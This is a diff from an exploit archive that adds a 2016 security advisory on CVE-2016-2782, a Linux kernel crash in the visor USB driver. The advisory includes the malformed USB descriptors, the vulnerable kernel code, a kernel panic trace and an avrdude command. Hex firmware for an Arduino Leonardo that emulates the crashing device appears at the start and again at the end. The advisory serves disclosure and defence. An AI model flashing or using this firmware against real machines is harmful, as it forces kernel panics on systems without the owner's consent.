+:100B5000AF919F918F917F916F915F914F913F9155 +:100B60002F911F910F91FF90EF90DF90CF90BF904A +:100B7000AF909F908F907F906F900F900FBE0F90CF +:100B80001F9018951F920F920FB60F9211248F93FA +:100B90009F938091E1001092E10083FF0FC01092BB +:100BA000E90091E09093EB001092EC0092E39093B7 +:100BB000ED001092720598E09093F00082FF1AC049 +:100BC00080917E05882339F080917E058150809345 +:100BD0007E05882369F080917D05882359F08091F6 +:100BE0007D05815080937D05811104C0289A02C043 +:100BF0005D9AF1CF9F918F910F900FBE0F901F9034 +:100C00001895CF93DF93CDB7DEB782E1FE0135961D +:100C1000A0E0B1E001900D928A95E1F78F89988D5F +:100C20009093760580937505898D9A8D90937405C0 +:100C3000809373058B8D9C8D90937C0580937B05B1 +:100C40008D8D9E8D90937A05809379058F8D98A1D7 +:100C500090937805809377051092720581E08093D8 +:100C6000D70080EA8093D80082E189BD09B400FEF4 +:100C7000FDCF61E070E080E090E00E94790280E9C1 +:100C80008093D8008CE08093E2001092E000559AA7 +:100C9000209ADF91CF91089581E08093E00008953C +:100CA0009091C80095FFFCCF8093CE0008951092DC +:100CB000CD0087E68093CC0088E18093C9008EE068 +:100CC0008093CA0008950F931F93CF93DF93EC0195 +:100CD0008C01FE0101900020E9F73197EC1BFD0B20 +:100CE000C8018C1B9D0B8E179F0730F4F801819172 +:100CF0008F010E945006EDCFDF91CF911F910F9190 +:100D00000895CF93DF93CDB7DEB7DA950FB6F89499 +:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193 +:100D20009F0160E071E0CE0101960E940507CE01AF +:100D300001960E946306D3950FB6F894DEBF0FBEEE +:100D4000CDBFDF91CF9108958F929F92AF92BF92C6 +:100D5000CF92DF92EF92FF920F931F93CF93DF9387 +:100D600000D0CDB7DEB75B0122E535E03F932F938E +:100D700089839A830E9481068981882E9A81992E7F +:100D80000F900F9000E010E08EE5E82E85E0F82E41 +:100D900091E1C92E94E0D92E0A151B05E4F4F40163 +:100DA00081914F0190E09F938F93FF92EF920E9469 +:100DB00081060F5F1F4FC8018F7099270F900F900A +:100DC0000F900F90892B41F7DF92CF920E948106FE +:100DD0000F900F90E1CF81E194E09F938F930E9459 +:100DE00081060F900F900F900F90DF91CF911F9180 +:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA +:100E00008F900895F8940C94E609AEE0B0E0EBE022 +:100E1000F7E00C94BD098C01CA0146E04C831A83AB +:100E2000098377FF02C060E070E8615071097E833A +:100E30006D83A901BC01CE0101960E9431074D814D +:100E40005E8157FD0AC02F813885421753070CF485 +:100E50009A01F801E20FF31F10822E96E4E00C9441 +:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E +:100E70006B018A01FC0117821682838181FFBDC14B +:100E8000CE0101964C01F7019381F60193FD859106 +:100E900093FF81916F01882309F4ABC1853239F446 +:100EA00093FD859193FF81916F01853229F4B701FC +:100EB00090E00E941909E7CF512C312C20E020321C +:100EC000A0F48B3269F030F4803259F0833269F447 +:100ED00020612CC08D3239F0803339F4216026C076 +:100EE0002260246023C0286021C027FD27C030ED88 +:100EF000380F3A3078F426FF06C0FAE05F9E300DD6 +:100F00001124532E13C08AE0389E300D1124332E45 +:100F100020620CC08E3221F426FD6BC1206406C015 +:100F20008C3611F4206802C0883641F4F60193FD36 +:100F3000859193FF81916F018111C1CF982F9F7D82 +:100F40009554933028F40C5F1F4FFFE3F9830DC0D5 +:100F5000833631F0833771F0833509F05BC022C0EE +:100F6000F801808189830E5F1F4F44244394512CE4 +:100F7000540115C03801F2E06F0E711CF801A08019 +:100F8000B18026FF03C0652D70E002C06FEF7FEFD8 +:100F9000C5012C870E940E092C0183012C852F7717 +:100FA000222E17C03801F2E06F0E711CF801A080EC +:100FB000B18026FF03C0652D70E002C06FEF7FEFA8 +:100FC000C5012C870E9403092C012C852068222E44 +:100FD000830123FC1BC0832D90E048165906B0F412 +:100FE000B70180E290E00E9419093A94F4CFF5012C +:100FF00027FC859127FE81915F01B70190E00E9457 +:10100000190931103A94F1E04F1A51084114510472 +:1010100071F7E5C0843611F0893639F5F80127FFFC +:1010200007C060817181828193810C5F1F4F08C06E +:1010300060817181882777FD8095982F0E5F1F4F03 +:101040002F76B22E97FF09C0909580957095619587 +:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF +:101060000E944B09A82EA81844C0853729F42F7E6A +:10107000B22E2AE030E025C0F22FF97FBF2E8F3646 +:10108000C1F018F4883579F0B4C0803719F088378A +:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA +:1010A0008460B82E09C024FF0AC09F2F9660B92E15 +:1010B00006C028E030E005C020E130E002C020E1B9 +:1010C00032E0F801B7FE07C06081718182819381AF +:1010D0000C5F1F4F06C06081718180E090E00E5F61 +:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3 +:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0 +:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8 +:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E +:10112000F11D8081803311F4297E09C022FF06C0A1 +:101130007394739404C0822F867809F0739423FD0E +:1011400013C020FF06C05A2C731418F4530C571800 +:10115000732C731468F4B70180E290E02C870E942E +:10116000190973942C85F5CF731410F4371801C046 +:10117000312C24FF12C0B70180E390E02C870E943D +:1011800019092C8522FF17C021FF03C088E590E0D4 +:1011900002C088E790E0B7010CC0822F867859F032 +:1011A00021FD02C080E201C08BE227FD8DE2B70184 +:1011B00090E00E941909A51438F4B70180E390E08B +:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F +:1011D0008081B70190E00E941909A110F5CF33205A +:1011E00009F451CEB70180E290E00E9419093A94C7 +:1011F000F6CFF7018681978102C08FEF9FEF2C9683 +:10120000E2E10C94CB09FC010590615070400110A3 +:10121000D8F7809590958E0F9F1F0895FC0161501F +:10122000704001900110D8F7809590958E0F9F1F08 +:1012300008950F931F93CF93DF93182F092FEB017E +:101240008B8181FD03C08FEF9FEF20C082FF10C014 +:101250004E815F812C813D81421753077CF4E881E8 +:10126000F9819F012F5F3F4F39832883108306C088 +:10127000E885F985812F0995892B29F72E813F81F2 +:101280002F5F3F4F3F832E83812F902FDF91CF9190 +:101290001F910F910895FA01AA27283051F12031AA +:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA +:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C +:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A +:1012D000711D811D911DA11D20D009F468943F91BD +:1012E0002AE0269F11243019305D3193DEF6CF01BC +:1012F0000895462F4770405D4193B3E00FD0C9F782 +:10130000F6CF462F4F70405D4A3318F0495D31FDEE +:101310004052419302D0A9F7EACFB4E0A695979541 +:10132000879577956795BA95C9F700976105710517 +:1013300008959B01AC010A2E069457954795379561 +:101340002795BA95C9F7620F731F841F951FA01DBB +:101350000895EE0FFF1F0590F491E02D09942F9250 +:101360003F924F925F926F927F928F929F92AF9235 +:10137000BF92CF92DF92EF92FF920F931F93CF9382 +:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19 +:101390000FBECDBF09942A88398848885F846E843F +:1013A0007D848C849B84AA84B984C884DF80EE8089 +:1013B000FD800C811B81AA81B981CE0FD11D0FB692 +:1013C000F894DEBF0FBECDBFED010895F894FFCFB6 +:1013D0001201000200000040AD0BEFBE000101024F +:1013E000000122034200610064002000420041002D +:1013F00042004500250078002500780025006E0099 +:101400002500700018034200410044002000430002 +:101410003000460046004500450021001201000250 +:10142000000000406A05900000010102030109026A +:10143000270001010000FA0705810304040C0705D9 +:10144000010204000C0705820104000C07000700DC +:101450000700480100500072006F006C00690066D0 +:101460000069006300000A550000006BFD180A00C7 +:10147000809F0AB901312B940A8101128946001319 +:10148000000257028B0A5E0AF80A5F01F21201009D +:1014900002010000400D055702000101020301B9DD +:1014A0000A0100F80A5F0A810A220342006100640F +:1014B0000020004200410042004500250078002540 +:1014C00000780025006E00250070001803420041DE +:1014D000004400200043003000460046004500451F +:1014E00000210012010002010000400D055702001A +:1014F000010102030109040000030100000003F2DE +:101500000AEC0A0902270001010000FA01AB0A09EE +:101510000400000301000000090200202020202018 +:101520005F5F5F5F5F5F5F5F2020202020202020C3 +:1015300020202020202020202020202020202020AB +:1015400020205F5F5F5F5F205F5F20205F202020A3 +:101550002020205F5F0A0D00202020202F205F5FC9 +:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7 +:101570005F5F20205F5F5F5F5F20202020202F20A3 +:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7 +:10159000202F5F5F0A0D002020202F202F202020E9 +:1015A0002F205F5F205C2F205F5F20602F205F5F18 +:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E +:1015C000205C2F205F5F2F202F205F5F5F2F202F59 +:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D +:1015E0002F202F202F202F5F2F202F202F5F2F2005 +:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4 +:101600002F202F5F2F202F202F5F5F2F202C3C0AB1 +:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B +:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63 +:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8 +:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048 +:101650003C3C2043485241534820414E59204F5072 +:1016600045524154494E472053595354454D203E0D +:101670003E0A0D00203C3C202863292053657267F8 +:10168000656A20536368756D696C6F20323031353F +:101690002C204F70656E536F7572636520536563C0 +:1016A00075726974792052616C66205370656E6E34 +:1016B0006562657267203E3E0A0D000A3E3E20507C +:1016C0007265737320627574746F6E20746F20730B +:1016D0007461727420657865637574696F6E2E2EFF +:1016E0002E0A0D005B44454255475D2045786563F1 +:1016F000757465207061796C6F616420300A0D002B +:10170000526563762D446174613A0A0D005B44456D +:101710004255475D200953656E6420436F6E6669CC +:101720006775726174696F6E446573637269707412 +:101730006F720928696E6465783A2569292E2E2E04 +:101740000D0A005B44454255475D200953656E64B0 +:1017500020496E74657266616365204465736372C7 +:101760006970746F720928696E7465726661636569 +:101770003A2569292E2E2E0D0A005B444542554715 +:101780005D200953656E6420456E64706F696E74E8 +:101790002044657363726970746F720928656E64A2 +:1017A000706F696E743A2569292E2E2E0D0A005B22 +:1017B00044454255475D203C3C70616E6963206D35 +:1017C0006F64653F3E3E0D0A005B44454255475DF0 +:1017D0002009203E3E20537472696E672044657371 +:1017E00063726970746F72207265717565737420AD +:1017F0002D2073656E64696E67206D616C666F7213 +:101800006D656420737472696E67212073657475E9 +:10181000702E7756616C75654C203D3D2025690D15 +:101820000A005B48455844554D505D0A0D0025306F +:04183000325820000A +:00000001FF diff --git a/platforms/linux/dos/39539.txt b/platforms/linux/dos/39539.txt new file mode 100755 index 000000000..e1e7e8b63 --- /dev/null +++ b/platforms/linux/dos/39539.txt @@ -0,0 +1,618 @@ +OS-S Security Advisory 2016-10 +Linux visor (treo_attach) Nullpointer Dereference + +Date: March 4th, 2016 +Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg +CVE: CVE-2016-2782 +CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) +Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid +USB device descriptors (visor treo_attach driver) +Severity: Critical. The Kernel panics. A reboot is required. +Ease of Exploitation: Trivial +Vulnerability type: Wrong input validation +Products: RHEL 7.1 including all updates +Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the +CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) +Vendor: Red Hat +Vendor contacted: November, 12th 2015 +PDF of advisory: https://os-s.net/advisories/OSS-2016-10_visor_treo_attach.pdf + +Abstract: +The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB +device requiring the visor (treo_attach) driver. + +Detailed product description: +We confirmed the bug on the following system: +RHEL 7.1 +Kernel 3.10.0-229.20.1.el7.x86_64 +Further products or kernel versions have not been tested. +How reproducible: Always +Actual results: Kernel crashes. + +Description: +The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo +(github.com/schumilo) using the following device descriptor: + +[*] Device-Descriptor +bLength: 0x12 +bDescriptorType: 0x1 +bcdUSB: 0x200 +bDeviceClass: 0x3 +bDeviceSubClass: 0x0 +bDeviceProtocol: 0x0 +bMaxPacketSize: 0x40 +idVendor: 0x82d +idProduct: 0x200 +bcdDevice: 0x100 +iManufacturer: 0x1 +iProduct: 0x2 +iSerialNumbers: 0x3 +bNumConfigurations: 0x1 + +The treo_attach function does not use the num_ports (struct usb_serial) value +for any kind of sanity checks during the initialization process. Due to an +incomplete sanity check, the driver could try to dereference a null-pointer if +a malformed device-descriptor is presented (zero-value for bNumEndpoints or no +required endpoint-descriptors is provided). +This results in a crash of the system. + +**** +... +554 #define COPY_PORT(dest, src) 555 do { 556 int i; 557 558 for (i = 0; i < ARRAY_SIZE(src->read_urbs); ++i) { 559 dest->read_urbs[i] = src->read_urbs[i]; \ /* Possible +Nullpointer-Dereference */ +560 dest->read_urbs[i]->context = dest; 561 dest->bulk_in_buffers[i] = src->bulk_in_buffers[i]; 562 } 563 dest->read_urb = src->read_urb; 564 dest->bulk_in_endpointAddress = src->bulk_in_endpointAddress;565 dest->bulk_in_buffer = src->bulk_in_buffer; 566 dest->bulk_in_size = src->bulk_in_size; 567 dest->interrupt_in_urb = src->interrupt_in_urb; 568 dest->interrupt_in_urb->context = dest; 569 dest->interrupt_in_endpointAddress = 570 src->interrupt_in_endpointAddress;571 dest->interrupt_in_buffer = src->interrupt_in_buffer; 572 } while (0); +573 +574 swap_port = kmalloc(sizeof(*swap_port), GFP_KERNEL); +575 if (!swap_port) +576 return -ENOMEM; +577 COPY_PORT(swap_port, serial->port[0]); /* no sanity-check! */ +578 COPY_PORT(serial->port[0], serial->port[1]); /* no sanity-check! */ +579 COPY_PORT(serial->port[1], swap_port); /* no sanity-check! */ +... +**** + +[*] Configuration-Descriptor +bLength: 0x9 +bDescriptorType: 0x2 +wTotalLength: 0x27 +bNumInterfaces: 0x1 +bConfigurationValue: 0x1 +iConfiguration: 0x0 +bmAttributes: 0x0 +bMaxPower: 0x31 +[*] Interface-Descriptor +bLength: 0x9 +bDescriptorType: 0x4 +bInterfaceNumber: 0x0 +bAlternateSetting: 0x0 +bNumEndpoints: 0x3 +bInterfaceClass: 0x0 +bInterfaceSubClass: 0x0 +bInterfaceProtocol: 0x0 +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x81 +bmAttribut: 0x3 +wMaxPacketSize: 0x404 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x1 +bmAttribut: 0x2 +wMaxPacketSize: 0x4 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x82 +bmAttribut: 0x1 +wMaxPacketSize: 0x4 +bInterval: 0xc + +Proof of Concept: +For a proof of concept, we are providing an Arduino Leonardo firmware file. This +firmware will emulate the defective USB device. + +avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U +flash:w:binary.hex + +The firmware has been attached to this bug report. +To prevent the automated delivery of the payload, a jumper may be used to +connect port D3 and 3V3! + +Severity and Ease of Exploitation: +The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, +only physical access to the system is required. + +Vendor Communication: +We contacted Red Hat on the November, 12th 2015. +This bug was fixed upstream. A CVE number was not assigned. + +References: +https://bugzilla.redhat.com/show_bug.cgi?id=1283374 +http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i +d=cac9b50b0d75a1d50d6c056ff65c005f3224c8e0 + +Kernel Stacktrace: + +[ 35.176832] usb 1-1: new full-speed USB device number 2 using xhci_hcd +[ 35.400183] usb 1-1: New USB device found, idVendor=082d, idProduct=0200 +[ 35.407780] usb 1-1: New USB device strings: Mfr=1, Product=2, +SerialNumber=3 +[ 35.417186] usb 1-1: Product: Ä? +[ 35.421846] usb 1-1: Manufacturer: Ä? +[ 35.425686] usb 1-1: SerialNumber: % +[ 35.438608] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc +says 96 microframes +[ 35.493316] usbcore: registered new interface driver visor +[ 35.503150] usbserial: USB Serial support registered for Handspring Visor / +Palm OS +[ 35.512980] usbserial: USB Serial support registered for Sony Clie 5.0 +[ 35.521056] usbserial: USB Serial support registered for Sony Clie 3.5 +[ 35.535245] visor 1-1:1.0: Handspring Visor / Palm OS converter detected +[ 35.542409] BUG: unable to handle kernel NULL pointer dereference at +00000000000000b0 +[ 35.543244] IP: [] treo_attach+0x61/0x340 [visor] +[ 35.543244] PGD 0 +[ 35.543244] Oops: 0002 [#1] SMP +[ 35.543244] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT +xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables +ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle +ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat +nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack +iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm +ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 +i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif +cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy +dm_mirror dm_region_hash dm_log dm_mod +[ 35.543244] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 35.543244] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 35.543244] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 +[ 35.543244] RIP: 0010:[] [] +treo_attach+0x61/0x340 [visor] +[ 35.543244] RSP: 0018:ffff88000bd23a78 EFLAGS: 00010286 +[ 35.543244] RAX: ffff88000003c000 RBX: ffff88000af979c0 RCX: 000000000000a0e2 +[ 35.543244] RDX: 0000000000000000 RSI: 00000000000000d0 RDI: ffff88000e401400 +[ 35.543244] RBP: ffff88000bd23a80 R08: 00000000000164c0 R09: ffff88000e401400 +[ 35.543244] R10: ffffffffa0393636 R11: ffff88000bcd0000 R12: 0000000000000404 +[ 35.543244] R13: ffff88000be6b000 R14: ffff88000af979c0 R15: ffffffffa0395400 +[ 35.543244] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 35.543244] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 35.543244] CR2: 00000000000000b0 CR3: 000000000c51f000 CR4: +00000000000006f0 +[ 35.543244] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 35.543244] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 35.543244] Stack: +[ 35.543244] ffff88000bcd0090 ffff88000bd23c18 ffffffff8145fed1 0000000000000007 +[ 35.543244] 000000020bd23af8 ffff88000c525830 0000000100000000 ffffffffa0395400 +[ 35.543244] 0000010000000001 ffff88000bcd0000 0000000000000100 +ffff88000bcd0090 +[ 35.543244] Call Trace: +[ 35.543244] [] usb_serial_probe+0xdb1/0x1230 +[ 35.543244] [] ? ida_get_new_above+0x7c/0x2a0 +[ 35.543244] [] ? kmem_cache_alloc+0x1ba/0x1d0 +[ 35.543244] [] ? sysfs_addrm_finish+0x42/0xe0 +[ 35.543244] [] ? __sysfs_add_one+0x61/0x100 +[ 35.543244] [] usb_probe_interface+0x1c4/0x2f0 +[ 35.543244] [] driver_probe_device+0x87/0x390 +[ 35.543244] [] __driver_attach+0x93/0xa0 +[ 35.543244] [] ? __device_attach+0x40/0x40 +[ 35.543244] [] bus_for_each_dev+0x73/0xc0 +[ 35.543244] [] driver_attach+0x1e/0x20 +[ 35.543244] [] usb_serial_register_drivers+0x29b/0x580 +[ 35.543244] [] ? 0xffffffffa0397fff +[ 35.543244] [] usb_serial_module_init+0x1e/0x1000 [visor] +[ 35.543244] [] do_one_initcall+0xb8/0x230 +[ 35.543244] [] load_module+0x133e/0x1b40 +[ 35.543244] [] ? ddebug_proc_write+0xf0/0xf0 +[ 35.543244] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 35.543244] [] SyS_finit_module+0xa6/0xd0 +[ 35.543244] [] system_call_fastpath+0x16/0x1b +[ 35.543244] Code: e1 ba 50 05 00 00 be d0 00 00 00 e8 4a 84 e1 e0 48 85 c0 +0f 84 e1 02 00 00 48 8b 53 20 48 8b 92 b8 01 00 00 48 89 90 b8 01 00 00 <48> +89 82 b0 00 00 00 48 8b 53 20 48 8b 92 a8 01 00 00 48 89 90 +[ 35.543244] RIP [] treo_attach+0x61/0x340 [visor] +[ 35.543244] RSP +[ 35.543244] CR2: 00000000000000b0 +[ 35.973188] ---[ end trace b239663354a1c556 ]--- +[ 35.978862] Kernel panic - not syncing: Fatal exception +[ 35.979835] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C4050C942F04CA +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940E02C1 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C5000B030E0302 +:1000B000010305032F032F032F03120316031A0353 +:1000C000200324032F032A030000000200080E006F +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E4EDF3E102C005900D92A436B107D1 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9404070C940000089545 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B +:1001B00083E00E94300361E087E00E94300361E049 +:1001C00088E00E9430030E9459067E012AE9E20E6F +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 +:1002C0009C92F4E01196FC9311971496EC93F9012B +:1002D000DC01292D01900D922A95E1F7FE01EC56E3 +:1002E000FF4FDC011B96FC93EE931A971D96BC9270 +:1002F000AE921C971183008373836283558344837A +:100300000C5211092CE0F80111922A95E9F721E02D +:10031000D80119962C931997FE01E059FF4F0190CF +:100320000D929A94E1F7F8019387828761E088E063 +:100330000E9469038BE492E00E94650688E892E0DF +:100340000E94650687EC92E00E94650686E093E0D5 +:100350000E94650682E493E00E9465068FE793E0C1 +:100360000E94650684EA93E00E9465068BEE93E0A6 +:100370000E94650683E00E949F03892B09F047C015 +:100380005E01F3E2AF0EB11C8824839482E1982EC3 +:1003900084E194E00E946506BF92AF92DF92CF9213 +:1003A000FF92EF921F928F921F930F932DB73EB73C +:1003B000225131090FB6F8943EBF0FBE2DBFADB725 +:1003C000BEB71196FE01FB96892D01900D928A957C +:1003D000E1F78DE695E00E94030668E873E180E0AE +:1003E00090E00E947B028DE695E00E944E0660E060 +:1003F00087E00E94690368E873E180E090E00E9472 +:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E +:1004100070E080E090E00E947B02ACCF1F920F92D0 +:100420000FB60F9211242F933F938F939F93AF9307 +:10043000BF938091650590916605A0916705B09185 +:1004400068053091640523E0230F2D3720F40196D1 +:10045000A11DB11D05C026E8230F0296A11DB11DE7 +:10046000209364058093650590936605A0936705C6 +:10047000B09368058091690590916A05A0916B051C +:10048000B0916C050196A11DB11D809369059093F3 +:100490006A05A0936B05B0936C05BF91AF919F91D6 +:1004A0008F913F912F910F900FBE0F901F90189535 +:1004B0003FB7F8948091690590916A05A0916B050A +:1004C000B0916C0526B5A89B05C02F3F19F0019689 +:1004D000A11DB11D3FBF6627782F892F9A2F620F6C +:1004E000711D811D911D42E0660F771F881F991FA6 +:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 +:10050000DF936B017C010E945802EB01C114D104FE +:10051000E104F10479F00E9458026C1B7D0B683EE7 +:100520007340A0F381E0C81AD108E108F108C8516E +:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 +:100540000895789484B5826084BD84B5816084BD4B +:1005500085B5826085BD85B5816085BDEEE6F0E03C +:10056000808181608083E1E8F0E010828081826098 +:100570008083808181608083E0E8F0E08081816019 +:100580008083E1E9F0E08081826080838081816006 +:100590008083E0E9F0E0808181608083E1ECF0E03D +:1005A000808184608083808182608083808181609B +:1005B0008083E3ECF0E0808181608083E0ECF0E018 +:1005C000808182608083E2ECF0E0808181608083C2 +:1005D000EAE7F0E0808184608083808182608083AC +:1005E000808181608083808180688083089590E02D +:1005F000FC013197EE30F10590F5EA5AFF4F0C946B +:10060000AB09809180008F7703C0809180008F7D3F +:1006100080938000089584B58F7702C084B58F7D64 +:1006200084BD0895809190008F7707C080919000DD +:100630008F7D03C080919000877F80939000089504 +:100640008091C0008F7703C08091C0008F7D809320 +:10065000C00008958091C200877F8093C2000895F2 +:10066000CF93DF9390E0FC01EA51FF4F2491FC010E +:10067000EC5FFE4F8491882349F190E0880F991F29 +:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 +:10069000C591D4919FB7611108C0F8948C912095B1 +:1006A00082238C93888182230AC0623051F4F894AB +:1006B0008C91322F309583238C938881822B888371 +:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 +:1006D00008950F931F93CF93DF931F92CDB7DEB78B +:1006E000282F30E0F901E853FF4F8491F901EA51D6 +:1006F000FF4F1491F901EC5FFE4F04910023C9F004 +:10070000882321F069830E94F7026981E02FF0E0DD +:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 +:100720008C91611103C01095812301C0812B8C93A2 +:100730009FBF0F90DF91CF911F910F910895CF939D +:10074000DF93282F30E0F901E853FF4F8491F9013E +:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 +:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 +:10077000EE5DFE4FA591B4912C912D2381E090E088 +:1007800021F480E002C080E090E0DF91CF910895F5 +:10079000615030F02091F100FC0120830196F8CFE8 +:1007A000289884E680937D0508951092E9001092C0 +:1007B00071051092700590936F0580936E050895F2 +:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 +:1007D000BA01C8010E94A606F80120E030E08EEFC1 +:1007E0002C173D0791F1F7FE02C0A49101C0A08132 +:1007F000609170057091710540916E0550916F0583 +:1008000064177507ACF49091E8009570E1F390914E +:10081000E80092FD1CC0A093F100A0917005B0917A +:1008200071051196AF73BB27AB2B11F48093E800D1 +:10083000A0917005B09171051196B0937105A093C8 +:1008400070052F5F3F4F3196CBCFC90102C08FEFAC +:100850009FEFDF91CF911F910F91FF9008951F920D +:100860000F920FB60F9211246F927F928F929F92E8 +:10087000AF92BF92CF92DF92EF92FF920F931F93AE +:100880002F933F934F935F936F937F938F939F9398 +:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 +:1008A0006297DEBFCDBF1092E9008091E80083FF20 +:1008B00046C168E0CE010A960E94C80382EF809389 +:1008C000E8009A8597FF05C08091E80080FFFCCF83 +:1008D00003C08EEF8093E800892F807609F023C152 +:1008E0008B85811105C01092F1001092F10020C19A +:1008F000282F2D7F213009F41BC1853049F48091C8 +:10090000E80080FFFCCF8C8580688093E30010C1F5 +:10091000863009F0E1C02D8508891989223009F057 +:10092000B3C0EC848E2D90E0209173053091740556 +:10093000821793070CF09FC00E94D5031F92EF927D +:100940008DE394E09F938F930E9483068CE0E89E52 +:1009500070011124E0917505F0917605EE0DFF1DF3 +:1009600089E0DE01119601900D928A95E1F7C801A8 +:100970000E94D50349E050E0BE016F5F7F4F80E0E9 +:100980000E94E0030F900F900F900F90C12CD12C7C +:10099000612C712C33E7A32E34E0B32E4AEA842E67 +:1009A00044E0942EE0917505F0917605EE0DFF1D63 +:1009B000818590E0681679060CF0BAC07F926F923C +:1009C000BF92AF920E948306E0917505F091760583 +:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 +:1009E00080E00E94E0030F900F900F900F9000E0C6 +:1009F00010E0E0917505F0917605EE0DFF1D028483 +:100A0000F385E02DEC0DFD1D818590E00817190799 